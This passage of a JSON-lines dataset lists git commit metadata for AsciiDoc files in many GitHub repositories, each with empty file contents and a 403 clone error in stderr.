hristophd\/camel,RohanHart\/camel,drsquidop\/camel,ullgren\/camel,lburgazzoli\/apache-camel,acartapanis\/camel,gautric\/camel,bgaudaen\/camel,RohanHart\/camel,nboukhed\/camel,driseley\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,jarst\/camel,bhaveshdt\/camel,nicolaferraro\/camel,mgyongyosi\/camel,snurmine\/camel,snurmine\/camel,jkorab\/camel,nboukhed\/camel,apache\/camel,pmoerenhout\/camel,sirlatrom\/camel,lburgazzoli\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,tlehoux\/camel,neoramon\/camel,bgaudaen\/camel,tdiesler\/camel,CodeSmell\/camel,ssharma\/camel,acartapanis\/camel,kevinearls\/camel,apache\/camel,onders86\/camel,DariusX\/camel,driseley\/camel,Fabryprog\/camel,jkorab\/camel,yuruki\/camel,tdiesler\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,NickCis\/camel,driseley\/camel,tadayosi\/camel,drsquidop\/camel,gilfernandes\/camel,acartapanis\/camel,jkorab\/camel,yuruki\/camel,neoramon\/camel,hqstevenson\/camel,zregvart\/camel,dmvolod\/camel,Thopap\/camel,mcollovati\/camel,driseley\/camel,w4tson\/camel,zregvart\/camel,akhettar\/camel,dmvolod\/camel,yuruki\/camel,nikhilvibhav\/camel,kevinearls\/camel,rmarting\/camel,tdiesler\/camel,rmarting\/camel,w4tson\/camel,pkletsko\/camel,pkletsko\/camel,tlehoux\/camel,mgyongyosi\/camel,chirino\/camel,anoordover\/camel,scranton\/camel,rmarting\/camel,tadayosi\/camel,jarst\/camel,veithen\/camel,lburgazzoli\/camel,sirlatrom\/camel,bhaveshdt\/camel,RohanHart\/camel,bgaudaen\/camel,scranton\/camel,jamesnetherton\/camel,apache\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,pax95\/camel,cunningt\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/exchangeProperty-language.adoc","new_file":"camel-core\/src\/main\/docs\/exchangeProperty-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b349ce88dbc6030a88ddced9fc6f0f928242c7e","subject":"Update 2017-10-25-Code-Reuse-In-Actual-Practice.adoc","message":"Update 2017-10-25-Code-Reuse-In-Actual-Practice.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-10-25-Code-Reuse-In-Actual-Practice.adoc","new_file":"_posts\/2017-10-25-Code-Reuse-In-Actual-Practice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d08dfa53946e13b5b957ad533c5864d6268542c","subject":"Update 2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","message":"Update 2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","new_file":"_posts\/2017-04-13-Week-3-Simple-enemy-AI-and-Spawn-Areas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fdea703fe1095d1957f42a64593141d77e14222","subject":"Update 2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","message":"Update 2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","new_file":"_posts\/2015-10-12-Smart-Health-Management-Part-2-PHR-as-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6576787e9ce47de71c1db543e54ed6623dd6ad49","subject":"Update 2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","message":"Update 2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","repos":"trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io","old_file":"_posts\/2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","new_file":"_posts\/2017-01-20-Automated-Testing-Using-Jenkins-on-AWS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trycrmr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08dfe0fd35bdc4fad0b2ae195b809fafa34f1666","subject":"short readme","message":"short readme","repos":"man-at-home\/folderstats_exporter","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/man-at-home\/folderstats_exporter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60d0daab7f211580d122a4d2e9aa789f1ffefe52","subject":"y2b create post Unboxing The YouTube Silver Play Button!","message":"y2b create post Unboxing The YouTube Silver Play Button!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-08-Unboxing-The-YouTube-Silver-Play-Button.adoc","new_file":"_posts\/2014-03-08-Unboxing-The-YouTube-Silver-Play-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9212d6c3e7f832a8b2427aa2378d303d0c0ae2f","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9bf27c0c0aeaa4f38b5f849f9c37061bd8fc067","subject":"Fix broken url for user-guide.pdf (#660)","message":"Fix broken url for user-guide.pdf (#660)\n\n","repos":"DozerMapper\/dozer,orange-buffalo\/dozer,garethahealy\/dozer,orange-buffalo\/dozer,DozerMapper\/dozer,garethahealy\/dozer","old_file":"docs\/asciidoc\/SUMMARY.adoc","new_file":"docs\/asciidoc\/SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/garethahealy\/dozer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80dc6924f814363040d231bc46ba6428616ed214","subject":"Update 2015-10-05-Two-sides-of-the-same-coin.adoc","message":"Update 2015-10-05-Two-sides-of-the-same-coin.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-Two-sides-of-the-same-coin.adoc","new_file":"_posts\/2015-10-05-Two-sides-of-the-same-coin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc77e790d66e133e7bbd6cb985f0334125936b6f","subject":"Update 2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","message":"Update 2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","new_file":"_posts\/2017-04-01-Kathiyawadi-Baingan-bhartha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"744525602272b2effdbf3d1b36637461b13e8389","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"596dfec0a46e4a924d58d45cb7384b99b35c01bb","subject":"Update 2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","message":"Update 2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","new_file":"_posts\/2015-10-20-Episode-26-Ten-Seconds-or-Less-and-No-Farts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd67c2f5e03c5e4c25444337f9b9e6521f1541f","subject":"Formatting","message":"Formatting","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2444ae3808311f7a427e8a2dc77583273a8b4cc7","subject":"y2b create post Zoom H1 Unboxing \\u0026 Overview","message":"y2b create post Zoom H1 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-03-Zoom-H1-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-03-Zoom-H1-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e8ff17f23519ba9bd0507feb78881fa00fa0cb8","subject":"Publish 20150327-Happy-Easter.adoc","message":"Publish 20150327-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"20150327-Happy-Easter.adoc","new_file":"20150327-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5f8d344fdbe7f99e863c93fdb4a52bf1f5d4fb7","subject":"Update 2017-03-10-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-10-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c3f3f115ec4f3f7e06d064287e846b951093502","subject":"Update 2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","message":"Update 2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","new_file":"_posts\/2017-06-01-Episode-101-Mr-Hart-whatta-mess.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d62e2ef330889a9d424df2f5a94ba1b2d25f35f8","subject":"y2b create post 3 Unique Gadgets You Can Buy Right Now","message":"y2b create post 3 Unique Gadgets You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-08-3UniqueGadgetsYouCanBuyRightNow.adoc","new_file":"_posts\/2018-02-08-3UniqueGadgetsYouCanBuyRightNow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90dc3e9735e849cd0905da6a275cb7649c650de0","subject":"Add Bnum adoc","message":"Add Bnum adoc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/ubf\/Bnum.adoc","new_file":"doc\/api\/ubf\/Bnum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"5fc0116e105ee9a4ff7f006f17d5bb17d419fb7a","subject":"Renamed '_posts\/2017-10-06-Making-working-with-google-app-script-easier.adoc' to '_posts\/2017-10-06-Making-google-app-script-easier.adoc'","message":"Renamed '_posts\/2017-10-06-Making-working-with-google-app-script-easier.adoc' to '_posts\/2017-10-06-Making-google-app-script-easier.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-10-06-Making-google-app-script-easier.adoc","new_file":"_posts\/2017-10-06-Making-google-app-script-easier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b524ecb3994b1b5eca7bdaff497170ae3a8e11d9","subject":"Update 2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","message":"Update 2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-A-A-A-A-A-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbba01162156dcd964175b6fc484a3ddb35130a4","subject":"Remove webapp setup instructions because the js files are checked into git (to make it easier to just run the project)","message":"Remove webapp setup instructions because the js files are checked into git (to make it easier to just run the project)\n","repos":"ge0ffrey\/optaconf,mdanter\/optaconf,oskopek\/optaconf,mdanter\/optaconf,oskopek\/optaconf,ge0ffrey\/optaconf,mdanter\/optaconf,ge0ffrey\/optaconf,oskopek\/optaconf","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdanter\/optaconf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b6a4b4268e61ce86234754ce5f42965a22d9f8e","subject":"Update 2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","message":"Update 2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","repos":"zouftou\/zouftou.github.io,zouftou\/zouftou.github.io","old_file":"_posts\/2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","new_file":"_posts\/2019-01-31-Spring-RES-Tul-Web-Service-MongoDB-Data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zouftou\/zouftou.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0f0a17558738a08ccf6eeb42c03a31591d9cc6f","subject":"Update 2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","message":"Update 2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","new_file":"_posts\/2015-11-16-Mover-ficheros-ocultos-entre-directorios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3245b24ce70694d81447542b66556f14ae7fa7e","subject":"fixing typo","message":"fixing typo\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9532f33ac70bc79a4ac7bec54c4d47002d6c35fc","subject":"add clojured","message":"add clojured\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojured.adoc","new_file":"content\/events\/2022\/clojured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9020b8d850253fb386f812460770058c247477b8","subject":"y2b create post The Wrist Mounted Flamethrower!","message":"y2b create post The Wrist Mounted Flamethrower!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-04-The-Wrist-Mounted-Flamethrower.adoc","new_file":"_posts\/2016-08-04-The-Wrist-Mounted-Flamethrower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a2d6559fb256e0f6a8a79f9b262d2558d60de03","subject":"Added first version of a migration guide for PrettyFaces 3.x users","message":"Added first version of a migration guide for PrettyFaces 3.x users\n","repos":"jsight\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/migration\/prettyfaces3.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/migration\/prettyfaces3.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsight\/rewrite.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"942172fe343dfeef66c16c360b20c08f04408e09","subject":"Fix attachment typo","message":"Fix attachment typo\n","repos":"Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98c090d54ebccd461f1eb9240dd753d7cf4ab651","subject":"Added contributing.","message":"Added contributing.\n","repos":"KotlinBy\/awesome-kotlin,KotlinBy\/awesome-kotlin,KotlinBy\/awesome-kotlin,KotlinBy\/awesome-kotlin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KotlinBy\/awesome-kotlin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de0c63d9718e367726525b36e40bc49268f59ea3","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8ec6c1a52a0a6cf6d11d897650fbdda743bafad","subject":"Better comment - CL","message":"Better comment - CL\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8fb52efdd74e53654acd167673842014385be5f0","subject":"Blog about BTM rename to APM (#178)","message":"Blog about BTM rename to APM (#178)","repos":"jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/06\/01\/hawkular-btm-to-apm.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/06\/01\/hawkular-btm-to-apm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fab6af6960c8e7c1d3afa04f64cb20c49e11b77b","subject":"Update 2017-05-31-Java-types.adoc","message":"Update 2017-05-31-Java-types.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-types.adoc","new_file":"_posts\/2017-05-31-Java-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1dc067df0e37bdbf007d1aa876a8e61707517c2","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab791ce7a8ca78898b2e6186649d861dbe723dd9","subject":"Update 2017-06-11-an-imaginary-commencement-address.adoc","message":"Update 2017-06-11-an-imaginary-commencement-address.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2017-06-11-an-imaginary-commencement-address.adoc","new_file":"_posts\/2017-06-11-an-imaginary-commencement-address.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8901cd5d38b2b5c648709938f85aa73f58404eae","subject":"Update 2015-09-07-Herzlich-Willkommen.adoc","message":"Update 2015-09-07-Herzlich-Willkommen.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_file":"_posts\/2015-09-07-Herzlich-Willkommen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6d6e62b4b437002b2e09304fdc00e36c2a3cd02","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75b2894a52b52b828cd4437811f314c56e7f8509","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d426e5c376b318b38361498e8e9258213105fa","subject":"[DOC] Update requirements","message":"[DOC] Update requirements\n","repos":"aie108\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/intro\/requirements.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/intro\/requirements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a8bf341270b15aedc59d40fd85a1a49112a9950","subject":"Update 2016-07-22-prova.adoc","message":"Update 